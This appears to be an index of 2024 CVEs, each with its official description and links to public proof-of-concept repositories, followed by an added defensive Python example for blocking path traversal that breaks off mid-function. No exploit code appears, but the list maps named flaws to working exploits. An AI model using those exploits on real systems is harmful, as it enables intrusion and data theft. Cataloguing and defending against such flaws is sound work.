Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.05.30 and prior to 2024.07.4 recognized root certificates from `GLOBALTRUST`. Certifi 2024.07.04 removes root certificates from `GLOBALTRUST` from the root store. These are in the process of being removed from Mozilla's trust store. `GLOBALTRUST`'s root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues."

- [roy-aladin/InfraTest](https://github.com/roy-aladin/InfraTest)

### CVE-2024-39700 (2024-07-16)

JupyterLab extension template is a `copier` template for JupyterLab extensions. Repositories created using this template with the `test` option include an `update-integration-tests.yml` workflow which has an RCE vulnerability. Extension authors hosting their code on GitHub are urged to upgrade the template to the latest version. Users who made changes to `update-integration-tests.yml` should accept overwriting of this file and re-apply their changes later. Users may wish to temporarily disable GitHub Actions while working on the upgrade. We recommend rebasing all open pull requests from untrusted users, as actions may run using the version from the `main` branch at the time when the pull request was created. Users who are upgrading from a template version prior to 4.3.0 may wish to leave out the proposed changes to the release workflow for now, as it requires additional configuration.

- [LOURC0D3/CVE-2024-39700-PoC](https://github.com/LOURC0D3/CVE-2024-39700-PoC)

### CVE-2024-39844 (2024-07-03)

In ZNC before 1.9.1, remote code execution can occur in modtcl via a KICK.

- [ph1ns/CVE-2024-39844](https://github.com/ph1ns/CVE-2024-39844)

### CVE-2024-39929 (2024-07-04)

Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users.

- [rxerium/CVE-2024-39929](https://github.com/rxerium/CVE-2024-39929)
- [michael-david-fry/CVE-2024-39929](https://github.com/michael-david-fry/CVE-2024-39929)

### CVE-2024-39943 (2024-07-04)

rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

- [truonghuuphuc/CVE-2024-39943-Poc](https://github.com/truonghuuphuc/CVE-2024-39943-Poc)

### CVE-2024-40080
- [perras/CVE-2024-40080](https://github.com/perras/CVE-2024-40080)

### CVE-2024-40110 (2024-07-12)

Sourcecodester Poultry Farm Management System v1.0 contains an Unauthenticated Remote Code Execution (RCE) vulnerability via the productimage parameter at /farm/product.php.

- [Abdurahmon3236/CVE-2024-40110](https://github.com/Abdurahmon3236/CVE-2024-40110)

### CVE-2024-40119 (2024-07-17)

Nepstech Wifi Router xpon (terminal) model NTPL-Xpon1GFEVN v.1.0 Firmware V2.0.1 contains a Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.

- [sudo-subho/nepstech-xpon-router-CVE-2024-40119](https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119)

### CVE-2024-40318 (2024-07-25)

An arbitrary file upload vulnerability in Webkul Qloapps v1.6.0.0 allows attackers to execute arbitrary code via uploading a crafted file.

- [3v1lC0d3/RCE-QloApps-CVE-2024-40318](https://github.com/3v1lC0d3/RCE-QloApps-CVE-2024-40318)

### CVE-2024-40324 (2024-07-25)

A CRLF injection vulnerability in E-Staff v5.1 allows attackers to insert Carriage Return (CR) and Line Feed (LF) characters into input fields, leading to HTTP response splitting and header manipulation.

- [aleksey-vi/CVE-2024-40324](https://github.com/aleksey-vi/CVE-2024-40324)

### CVE-2024-40348 (2024-07-20)

An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal.

- [bigb0x/CVE-2024-40348](https://github.com/bigb0x/CVE-2024-40348)

### CVE-2024-40422 (2024-07-24)

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.

- [alpernae/CVE-2024-40422](https://github.com/alpernae/CVE-2024-40422)
- [j3r1ch0123/CVE-2024-40422](https://github.com/j3r1ch0123/CVE-2024-40422)

### CVE-2024-40431
- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN)

### CVE-2024-40457 (2024-09-12)

No-IP Dynamic Update Client (DUC) v3.x uses cleartext credentials that may occur on a command line or in a file. NOTE: the vendor's position is that cleartext in /etc/default/noip-duc is recommended and is the intentional behavior.

- [jeppojeps/CVE-2024-40457-PoC](https://github.com/jeppojeps/CVE-2024-40457-PoC)

### CVE-2024-40492 (2024-07-17)

Cross Site Scripting vulnerability in Heartbeat Chat v.15.2.1 allows a remote attacker to execute arbitrary code via the setname function.

- [minendie/POC_CVE-2024-40492](https://github.com/minendie/POC_CVE-2024-40492)

### CVE-2024-40498 (2024-08-05)

SQL Injection vulnerability in PuneethReddyHC Online Shopping system advanced v.1.0 allows an attacker to execute arbitrary code via register.php.

- [Dirac231/CVE-2024-40498](https://github.com/Dirac231/CVE-2024-40498)

### CVE-2024-40500 (2024-08-12)

Cross Site Scripting vulnerability in Martin Kucej i-librarian v.5.11.0 and before allows a local attacker to execute arbitrary code via the search function in the import component.

- [nitipoom-jar/CVE-2024-40500](https://github.com/nitipoom-jar/CVE-2024-40500)

### CVE-2024-40506
- [Jansen-C-Moreira/CVE-2024-40506](https://github.com/Jansen-C-Moreira/CVE-2024-40506)

### CVE-2024-40507
- [Jansen-C-Moreira/CVE-2024-40507](https://github.com/Jansen-C-Moreira/CVE-2024-40507)

### CVE-2024-40508
- [Jansen-C-Moreira/CVE-2024-40508](https://github.com/Jansen-C-Moreira/CVE-2024-40508)

### CVE-2024-40509
- [Jansen-C-Moreira/CVE-2024-40509](https://github.com/Jansen-C-Moreira/CVE-2024-40509)

### CVE-2024-40510
- [Jansen-C-Moreira/CVE-2024-40510](https://github.com/Jansen-C-Moreira/CVE-2024-40510)

### CVE-2024-40511
- [Jansen-C-Moreira/CVE-2024-40511](https://github.com/Jansen-C-Moreira/CVE-2024-40511)

### CVE-2024-40512
- [Jansen-C-Moreira/CVE-2024-40512](https://github.com/Jansen-C-Moreira/CVE-2024-40512)

### CVE-2024-40617 (2024-07-17)

Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access-restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked.

- [KyssK00L/CVE-2024-40617](https://github.com/KyssK00L/CVE-2024-40617)

### CVE-2024-40658 (2024-09-11)

In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658)

### CVE-2024-40662 (2024-09-11)

In scheme of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [Aakashmom/net_G2.5_CVE-2024-40662](https://github.com/Aakashmom/net_G2.5_CVE-2024-40662)

### CVE-2024-40673
- [Aakashmom/G3_libcore_native_CVE-2024-40673](https://github.com/Aakashmom/G3_libcore_native_CVE-2024-40673)

### CVE-2024-40675
- [Aakashmom/intent_CVE-2024-40675](https://github.com/Aakashmom/intent_CVE-2024-40675)

### CVE-2024-40676
- [Aakashmom/frameworks_base_accounts_CVE-2024-40676](https://github.com/Aakashmom/frameworks_base_accounts_CVE-2024-40676)
- [Aakashmom/accounts_CVE-2024-40676-](https://github.com/Aakashmom/accounts_CVE-2024-40676-)

### CVE-2024-40711 (2024-09-07)

A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).

- [watchtowrlabs/CVE-2024-40711](https://github.com/watchtowrlabs/CVE-2024-40711)
- [realstatus/CVE-2024-40711-Exp](https://github.com/realstatus/CVE-2024-40711-Exp)

### CVE-2024-40725 (2024-07-18)

A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.

Users are recommended to upgrade to version 2.4.62, which fixes this issue.

- [TAM-K592/CVE-2024-40725-CVE-2024-40898](https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898)

### CVE-2024-40892 (2024-08-12)

A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely).

- [xen0bit/fwbt](https://github.com/xen0bit/fwbt)

### CVE-2024-41107 (2024-07-19)

The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.

Affected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.

- [d0rb/CVE-2024-41107](https://github.com/d0rb/CVE-2024-41107)

### CVE-2024-41110 (2024-07-24)

Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.

Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.

A security issue was discovered in 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.

Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.

docker-ce v27.1.1 contains patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.

- [vvpoglazov/cve-2024-41110-checker](https://github.com/vvpoglazov/cve-2024-41110-checker)
- [PauloParoPP/CVE-2024-41110-SCAN](https://github.com/PauloParoPP/CVE-2024-41110-SCAN)

### CVE-2024-41276
- [artemy-ccrsky/CVE-2024-41276](https://github.com/artemy-ccrsky/CVE-2024-41276)

### CVE-2024-41290
- [paragbagul111/CVE-2024-41290](https://github.com/paragbagul111/CVE-2024-41290)

### CVE-2024-41301
- [patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting](https://github.com/patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting)

### CVE-2024-41302
- [patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection](https://github.com/patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection)

### CVE-2024-41312
- [Amal264882/CVE-2024-41312.](https://github.com/Amal264882/CVE-2024-41312.)

### CVE-2024-41570 (2024-08-09)

An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server.

- [chebuya/Havoc-C2-SSRF-poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)

### CVE-2024-41628 (2024-07-26)

Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API.

- [Redshift-CyberSecurity/CVE-2024-41628](https://github.com/Redshift-CyberSecurity/CVE-2024-41628)

### CVE-2024-41640 (2024-07-29)

Cross Site Scripting (XSS) vulnerability in AML Surety Eco up to 3.5 allows an attacker to run arbitrary code via crafted GET request using the id parameter.

- [alemusix/CVE-2024-41640](https://github.com/alemusix/CVE-2024-41640)

### CVE-2024-41651 (2024-08-12)

An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality.

- [Fckroun/CVE-2024-41651](https://github.com/Fckroun/CVE-2024-41651)

### CVE-2024-41662 (2024-07-24)

VNote is a note-taking platform. A Cross-Site Scripting (XSS) vulnerability has been identified in the Markdown rendering functionality of versions 3.18.1 and prior of the VNote note-taking application. This vulnerability allows the injection and execution of arbitrary JavaScript code through which remote code execution can be achieved. A patch for this issue is available at commit f1af78573a0ef51d6ef6a0bc4080cddc8f30a545. Other mitigation strategies include implementing rigorous input sanitization for all Markdown content and utilizing a secure Markdown parser that appropriately escapes or strips potentially dangerous content.

- [sh3bu/CVE-2024-41662](https://github.com/sh3bu/CVE-2024-41662)

### CVE-2024-41958 (2024-08-05)

mailcow: dockerized is an open source groupware/email suite based on docker. A vulnerability has been discovered in the two-factor authentication (2FA) mechanism. This flaw allows an authenticated attacker to bypass the 2FA protection, enabling unauthorized access to other accounts that are otherwise secured with 2FA. To exploit this vulnerability, the attacker must first have access to an account within the system and possess the credentials of the target account that has 2FA enabled. By leveraging these credentials, the attacker can circumvent the 2FA process and gain access to the protected account. This issue has been addressed in the `2024-07` release. All users are advised to upgrade. There are no known workarounds for this vulnerability.

- [OrangeJuiceHU/CVE-2024-41958-PoC](https://github.com/OrangeJuiceHU/CVE-2024-41958-PoC)

### CVE-2024-41992
- [fj016/CVE-2024-41992-PoC](https://github.com/fj016/CVE-2024-41992-PoC)

### CVE-2024-42461 (2024-08-02)

In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed.

- [fevar54/CVE-2024-42461](https://github.com/fevar54/CVE-2024-42461)

### CVE-2024-42640
- [rvizx/CVE-2024-42640](https://github.com/rvizx/CVE-2024-42640)

### CVE-2024-42642 (2024-09-04)

Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller.

- [VL4DR/CVE-2024-42642](https://github.com/VL4DR/CVE-2024-42642)

### CVE-2024-42657 (2024-08-19)

An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during the login process.

- [sudo-subho/CVE-2024-42657](https://github.com/sudo-subho/CVE-2024-42657)

### CVE-2024-42658 (2024-08-19)

An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookie's parameter.

- [sudo-subho/CVE-2024-42658](https://github.com/sudo-subho/CVE-2024-42658)

### CVE-2024-42758 (2024-08-16)

A Cross-site Scripting (XSS) vulnerability exists in version v2024-01-05 of the indexmenu plugin when it is installed and enabled in Dokuwiki (Open Source Wiki Engine). A malicious attacker can input XSS payloads, for example when creating or editing an existing page, to trigger the XSS on Dokuwiki; the payload is stored in a .txt file (due to the nature of how Dokuwiki is designed), which makes this a stored XSS.

- [1s1ldur/CVE-2024-42758](https://github.com/1s1ldur/CVE-2024-42758)

### CVE-2024-42834
- [CyberSec-Supra/CVE-2024-42834](https://github.com/CyberSec-Supra/CVE-2024-42834)

### CVE-2024-42845 (2024-08-23)

An eval Injection vulnerability in the component invesalius/reader/dicom.py of InVesalius 3.1.99991 through 3.1.99998 allows attackers to execute arbitrary code via loading a crafted DICOM file.

- [partywavesec/invesalius3_vulnerabilities](https://github.com/partywavesec/invesalius3_vulnerabilities)

### CVE-2024-42849 (2024-08-16)

An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function.

- [njmbb8/CVE-2024-42849](https://github.com/njmbb8/CVE-2024-42849)

### CVE-2024-42850 (2024-08-16)

An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.

- [njmbb8/CVE-2024-42850](https://github.com/njmbb8/CVE-2024-42850)

### CVE-2024-42861
- [qiupy123/CVE-2024-42861](https://github.com/qiupy123/CVE-2024-42861)

### CVE-2024-42919 (2024-08-20)

eScan Management Console 14.0.1400.2281 is vulnerable to Incorrect Access Control via acteScanAVReport.

- [jeyabalaji711/CVE-2024-42919](https://github.com/jeyabalaji711/CVE-2024-42919)

### CVE-2024-42992
- [thanhh23/CVE-2024-42992](https://github.com/thanhh23/CVE-2024-42992)

### CVE-2024-43035
- [ZeroPathAI/Fonoster-LFI-PoC](https://github.com/ZeroPathAI/Fonoster-LFI-PoC)

### CVE-2024-43044 (2024-08-07)

Jenkins 2.470 and earlier, LTS 2.452.3 and earlier allows agent processes to read arbitrary files from the Jenkins controller file system by using the `ClassLoaderProxy#fetchJar` method in the Remoting library.

- [HwMex0/CVE-2024-43044](https://github.com/HwMex0/CVE-2024-43044)
- [jenkinsci-cert/SECURITY-3430](https://github.com/jenkinsci-cert/SECURITY-3430)
- [v9d0g/CVE-2024-43044-POC](https://github.com/v9d0g/CVE-2024-43044-POC)
- [convisolabs/CVE-2024-43044-jenkins](https://github.com/convisolabs/CVE-2024-43044-jenkins)

### CVE-2024-43160 (2024-08-13)

Unrestricted Upload of File with Dangerous Type vulnerability in BerqWP allows Code Injection. This issue affects BerqWP: from n/a through 1.7.6.

- [KTN1990/CVE-2024-43160](https://github.com/KTN1990/CVE-2024-43160)

### CVE-2024-43363
- [p33d/CVE-2024-43363](https://github.com/p33d/CVE-2024-43363)

### CVE-2024-43425
- [RedTeamPentesting/moodle-rce-calculatedquestions](https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions)

### CVE-2024-43532
- [HazeLook/CVE-2024-43532](https://github.com/HazeLook/CVE-2024-43532)
- [Jaden1419/CVE-2024-43532](https://github.com/Jaden1419/CVE-2024-43532)
- [ShawtyTwo/CVE-2024-43532](https://github.com/ShawtyTwo/CVE-2024-43532)

### CVE-2024-43582
- [jinxongwi/CVE-2024-43582-RCE](https://github.com/jinxongwi/CVE-2024-43582-RCE)

### CVE-2024-43917 (2024-08-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TemplateInvaders TI WooCommerce Wishlist allows SQL Injection. This issue affects TI WooCommerce Wishlist: from n/a through 2.8.2.

- [p33d/CVE-2024-43917](https://github.com/p33d/CVE-2024-43917)

### CVE-2024-43918 (2024-08-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW WBW Product Table PRO allows SQL Injection. This issue affects WBW Product Table PRO: from n/a through 1.9.4.

- [KTN1990/CVE-2024-43918](https://github.com/KTN1990/CVE-2024-43918)

### CVE-2024-43965 (2024-08-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection. This issue affects SendGrid for WordPress: from n/a through 1.4.

- [RandomRobbieBF/CVE-2024-43965](https://github.com/RandomRobbieBF/CVE-2024-43965)

### CVE-2024-43998
- [RandomRobbieBF/CVE-2024-43998](https://github.com/RandomRobbieBF/CVE-2024-43998)

### CVE-2024-44000
- [absholi7ly/CVE-2024-44000-LiteSpeed-Cache](https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache)
- [gbrsh/CVE-2024-44000](https://github.com/gbrsh/CVE-2024-44000)
- [ifqygazhar/CVE-2024-44000-LiteSpeed-Cache](https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache)
- [geniuszlyy/CVE-2024-44000](https://github.com/geniuszlyy/CVE-2024-44000)
- [zgimszhd61/CVE-2024-44000](https://github.com/zgimszhd61/CVE-2024-44000)

### CVE-2024-44083 (2024-08-19)

ida64.dll in Hex-Rays IDA Pro through 8.4 crashes when there is a section that has many jumps linked, and the final jump corresponds to the payload from where the actual entry point will be invoked. NOTE: in many use cases, this is an inconvenience but not a security issue.

- [Azvanzed/CVE-2024-44083](https://github.com/Azvanzed/CVE-2024-44083)

### CVE-2024-44193
- [mbog14/CVE-2024-44193](https://github.com/mbog14/CVE-2024-44193)

### CVE-2024-44337
- [Brinmon/CVE-2024-44337](https://github.com/Brinmon/CVE-2024-44337)

### CVE-2024-44346
- [Shauryae1337/CVE-2024-44346](https://github.com/Shauryae1337/CVE-2024-44346)
- [sahil3276/CVE-2024-44346](https://github.com/sahil3276/CVE-2024-44346)

### CVE-2024-44349
- [AndreaF17/PoC-CVE-2024-44349](https://github.com/AndreaF17/PoC-CVE-2024-44349)

### CVE-2024-44450
- [VoidSecOrg/CVE-2024-44450](https://github.com/VoidSecOrg/CVE-2024-44450)

### CVE-2024-44541 (2024-09-11)

evilnapsis Inventio Lite Versions v4 and before is vulnerable to SQL Injection via the "username" parameter in "/?action=processlogin."

- [pointedsec/CVE-2024-44541](https://github.com/pointedsec/CVE-2024-44541)

### CVE-2024-44542
- [alphandbelt/CVE-2024-44542](https://github.com/alphandbelt/CVE-2024-44542)

### CVE-2024-44610
- [BertoldVdb/PcanExploit](https://github.com/BertoldVdb/PcanExploit)

### CVE-2024-44623 (2024-09-16)

An issue in TuomoKu SPx-GC v.1.3.0 and before allows a remote attacker to execute arbitrary code via the child_process.js function.

- [merbinr/CVE-2024-44623](https://github.com/merbinr/CVE-2024-44623)

### CVE-2024-44812
- [b1u3st0rm/CVE-2024-44812-PoC](https://github.com/b1u3st0rm/CVE-2024-44812-PoC)

### CVE-2024-44815 (2024-09-10)

Vulnerability in Hathway Skyworth Router CM5100 v.4.1.1.24 allows a physically proximate attacker to obtain user credentials via SPI flash Firmware W25Q64JV.

- [nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-](https://github.com/nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-)

### CVE-2024-44849 (2024-09-09)

Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.

- [extencil/CVE-2024-44849](https://github.com/extencil/CVE-2024-44849)

### CVE-2024-44867 (2024-09-10)

phpok v3.0 was discovered to contain an arbitrary file read vulnerability via the component /autoload/file.php.

- [ChengZyin/CVE-2024-44867](https://github.com/ChengZyin/CVE-2024-44867)

### CVE-2024-44902 (2024-09-09)

A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.

- [fru1ts/CVE-2024-44902](https://github.com/fru1ts/CVE-2024-44902)

### CVE-2024-44946 (2024-08-31)

In the Linux kernel, the following vulnerability has been resolved:

kcm: Serialise kcm_sendmsg() for the same socket.

syzkaller reported UAF in kcm_release(). [0]

The scenario is

1. Thread A builds a skb with MSG_MORE and sets kcm->seq_skb.
2. Thread A resumes building skb from kcm->seq_skb but is blocked by sk_stream_wait_memory()
3. Thread B calls sendmsg() concurrently, finishes building kcm->seq_skb and puts the skb to the write queue
4. Thread A faces an error and finally frees skb that is already in the write queue
5. kcm_release() does double-free the skb in the write queue

When a thread is building a MSG_MORE skb, another thread must not touch it.

Let's add a per-sk mutex and serialise kcm_sendmsg().

[0]: (KASAN slab-use-after-free report in kcm_release(), net/kcm/kcmsock.c:1691; the report is truncated in the source)

- [Abdurahmon3236/CVE-2024-44946](https://github.com/Abdurahmon3236/CVE-2024-44946)

### CVE-2024-44947 (2024-09-02)

In the Linux kernel, the following vulnerability has been resolved:

fuse: Initialize beyond-EOF page contents before setting uptodate

fuse_notify_store(), unlike fuse_do_readpage(), does not enable page zeroing (because it can be used to change partial page contents).

So fuse_notify_store() must be more careful to fully initialize page contents (including parts of the page that are beyond end-of-file) before marking the page uptodate.

The current code can leave beyond-EOF page contents uninitialized, which makes these uninitialized page contents visible to userspace via mmap().

This is an information leak, but only affects systems which do not enable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the corresponding kernel command line parameter).

- [Abdurahmon3236/CVE-2024-44947](https://github.com/Abdurahmon3236/CVE-2024-44947)

### CVE-2024-45058 (2024-08-28)

i-Educar is free, fully online school management software that can be used by school secretaries, teachers, coordinators, and area managers. Prior to the 2.9 branch, an attacker with only minimal viewing privileges in the settings section is able to change their user type to Administrator (or another type with super-permissions) through a specifically crafted POST request to `/intranet/educar_usuario_cad.php`, modifying the `nivel_usuario_` parameter. The vulnerability occurs in the file located at `ieducar/intranet/educar_usuario_cad.php`, which does not check the user's current permission level before allowing changes. Commit c25910cdf11ab50e50162a49dd44bef544422b6e contains a patch for the issue.

- [0xbhsu/CVE-2024-45058](https://github.com/0xbhsu/CVE-2024-45058)

### CVE-2024-45200
- [latte-soft/kartlanpwn](https://github.com/latte-soft/kartlanpwn)

### CVE-2024-45241 (2024-08-26)

A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.

- [d4lyw/CVE-2024-45241](https://github.com/d4lyw/CVE-2024-45241)
- [verylazytech/CVE-2024-45241](https://github.com/verylazytech/CVE-2024-45241)

### CVE-2024-45244 (2024-08-25)

Hyperledger Fabric through 2.5.9 does not verify that a request has a timestamp within the expected time window.

- [shanker-sec/HLF_TxTime_spoofing](https://github.com/shanker-sec/HLF_TxTime_spoofing)
- [shanker-sec/hlf-time-oracle](https://github.com/shanker-sec/hlf-time-oracle)

### CVE-2024-45264 (2024-08-27)

A cross-site request forgery (CSRF) vulnerability in the admin panel in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to add a new administrator, leading to escalation of privileges.

- [TheHermione/CVE-2024-45264](https://github.com/TheHermione/CVE-2024-45264)

### CVE-2024-45265 (2024-08-26)

A SQL injection vulnerability in the poll component in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to execute arbitrary SQL commands via the psid parameter.

- [TheHermione/CVE-2024-45265](https://github.com/TheHermione/CVE-2024-45265)

### CVE-2024-45383 (2024-09-12)

A mishandling of IRP requests vulnerability exists in the HDAudBus_DMA interface of Microsoft High Definition Audio Bus Driver 10.0.19041.3636 (WinBuild.160101.0800). A specially crafted application can issue multiple IRP Complete requests which leads to a local denial-of-service. An attacker can execute malicious script/application to trigger this vulnerability.

- [SpiralBL0CK/CVE-2024-45383](https://github.com/SpiralBL0CK/CVE-2024-45383)

### CVE-2024-45409 (2024-09-10)

The Ruby SAML library implements the client (service provider) side of SAML authentication. Ruby-SAML in <= 1.12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any SAML document signed by the IdP can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as an arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.

- [synacktiv/CVE-2024-45409](https://github.com/synacktiv/CVE-2024-45409)

### CVE-2024-45410
- [jphetphoumy/traefik-CVE-2024-45410-poc](https://github.com/jphetphoumy/traefik-CVE-2024-45410-poc)

### CVE-2024-45436 (2024-08-29)

extractFromZipFile in model.go in Ollama before 0.1.47 can extract members of a ZIP archive outside of the parent directory.

- [pankass/CVE-2024-45436](https://github.com/pankass/CVE-2024-45436)
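
The two traversal entries above share one root cause: an attacker-controlled path fragment (a ZIP member name in Ollama's `extractFromZipFile`, the `rpt` parameter in CryWolf's `GeneralDocs.aspx`) is joined to a base directory without checking where the result lands. The block below is an added example, not code from either project, showing a single containment check that serves both cases; all paths, the archive contents and the temp directory are constructed for the demo.

```python
"""Added example (not code from Ollama or CentralSquare CryWolf): one
containment check that rejects a ZIP member escaping the extraction
directory (CVE-2024-45436) and a request parameter escaping a document
root (CVE-2024-45241). All paths and archive contents are constructed."""
import io
import os
import tempfile
import zipfile


def safe_join(base_dir: str, untrusted: str) -> str:
    """Return an absolute path inside base_dir or raise ValueError.

    realpath() collapses '..' and follows symlinks, so the test runs on the
    path the OS would actually open. An absolute `untrusted` value replaces
    base_dir inside os.path.join, which commonpath then catches as well.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, untrusted))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"{untrusted!r} resolves outside {base_dir!r}")
    return target


def extract_zip(data: bytes, dest_dir: str) -> list[str]:
    """Extract an in-memory ZIP into dest_dir, or write nothing at all.

    Every member name is validated before the first byte is written, so a
    hostile member cannot leave a half-extracted archive behind.
    """
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = [(info, safe_join(dest_dir, info.filename)) for info in zf.infolist()]
        for info, out_path in members:
            if info.is_dir():
                os.makedirs(out_path, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            with zf.open(info) as src, open(out_path, "wb") as dst:
                dst.write(src.read())
            written.append(out_path)
    return written


def report_path(doc_root: str, rpt: str) -> str:
    """An 'rpt'-style request parameter gets exactly the same containment check."""
    return safe_join(doc_root, rpt)


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build a ZIP in memory; writestr() keeps member names verbatim, '../' included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo() -> dict:
    """Run both checks against constructed inputs inside a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "models")
        good = build_zip({"model/config.json": b"{}", "model/weights.bin": b"\x00" * 8})
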